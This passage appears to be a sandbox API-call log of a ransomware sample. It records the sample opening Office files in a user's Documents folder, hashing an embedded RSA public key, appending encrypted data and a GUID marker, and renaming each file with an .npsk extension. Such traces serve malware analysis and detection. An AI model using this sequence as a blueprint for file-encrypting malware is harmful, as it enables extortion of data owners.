nFileSizeLow=0xd491, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IUKPZNXasUl_cxb.docx", cAlternateFileName="IUKPZN~1.DOC")) returned 1 [0215.469] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IUKPZNXasUl_cxb.docx") returned=".docx" [0215.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IUKPZNXasUl_cxb.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iukpznxasul_cxb.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.475] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=54417) returned 1 [0215.475] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.483] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd46b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.483] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.494] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xd491, lpOverlapped=0x0) returned 1 [0215.496] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.496] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.496] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.496] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.497] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.497] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.497] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.497] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.497] GetLastError () returned 0x0 [0215.497] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.497] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.497] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.497] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.498] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.498] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.501] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd491, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.501] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.502] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.502] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.502] CloseHandle (hObject=0x61c) returned 1 [0215.520] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IUKPZNXasUl_cxb.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iukpznxasul_cxb.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IUKPZNXasUl_cxb.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iukpznxasul_cxb.docx.npsk")) returned 1 [0215.522] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3b32a0, ftCreationTime.dwHighDateTime=0x1d5af03, ftLastAccessTime.dwLowDateTime=0xcf84a810, ftLastAccessTime.dwHighDateTime=0x1d5afd5, ftLastWriteTime.dwLowDateTime=0xcf84a810, ftLastWriteTime.dwHighDateTime=0x1d5afd5, nFileSizeHigh=0x0, nFileSizeLow=0x1841a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jHQSeSZMa625b.pptx", cAlternateFileName="JHQSES~1.PPT")) returned 1 [0215.522] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jHQSeSZMa625b.pptx") returned=".pptx" [0215.522] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jHQSeSZMa625b.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jhqseszma625b.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.523] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=99354) returned 1 [0215.523] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.525] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x183f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.525] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.528] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1841a, lpOverlapped=0x0) returned 1 [0215.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.529] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.530] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.530] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.530] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.531] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.531] GetLastError () returned 0x0 [0215.531] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.531] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.531] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.531] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.531] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.532] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.533] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1841a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.533] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.533] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.533] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.533] CloseHandle (hObject=0x61c) returned 1 [0215.539] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jHQSeSZMa625b.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jhqseszma625b.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jHQSeSZMa625b.pptx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jhqseszma625b.pptx.npsk")) returned 1 [0215.542] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dd3ebc0, ftCreationTime.dwHighDateTime=0x1d58deb, ftLastAccessTime.dwLowDateTime=0x116f6570, ftLastAccessTime.dwHighDateTime=0x1d5822d, ftLastWriteTime.dwLowDateTime=0x116f6570, ftLastWriteTime.dwHighDateTime=0x1d5822d, nFileSizeHigh=0x0, nFileSizeLow=0x1340a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MIsET.docx", cAlternateFileName="MISET~1.DOC")) returned 1 [0215.542] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MIsET.docx") returned=".docx" [0215.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MIsET.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\miset.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.542] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=78858) returned 1 [0215.542] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.544] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x133e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.545] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.546] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1340a, lpOverlapped=0x0) returned 1 [0215.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.548] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.549] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.549] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.549] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.549] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.549] GetLastError () returned 0x0 [0215.549] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.549] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.549] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.549] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.549] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.550] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.551] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1340a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.551] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.551] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.551] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.552] CloseHandle (hObject=0x61c) returned 1 [0215.556] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MIsET.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\miset.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MIsET.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\miset.docx.npsk")) returned 1 [0215.558] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48fab230, ftCreationTime.dwHighDateTime=0x1d5e5b8, ftLastAccessTime.dwLowDateTime=0x1cc9ee70, ftLastAccessTime.dwHighDateTime=0x1d5d865, ftLastWriteTime.dwLowDateTime=0x1cc9ee70, ftLastWriteTime.dwHighDateTime=0x1d5d865, nFileSizeHigh=0x0, nFileSizeLow=0x902e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MxfHp.ppt", cAlternateFileName="")) returned 1 [0215.558] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MxfHp.ppt") returned=".ppt" [0215.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MxfHp.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxfhp.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.559] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=36910) returned 1 [0215.559] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.562] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x9008, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.562] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.564] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x902e, lpOverlapped=0x0) returned 1 [0215.565] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.565] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.565] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.565] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.566] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.566] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.566] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.566] CryptGetHashParam (in: 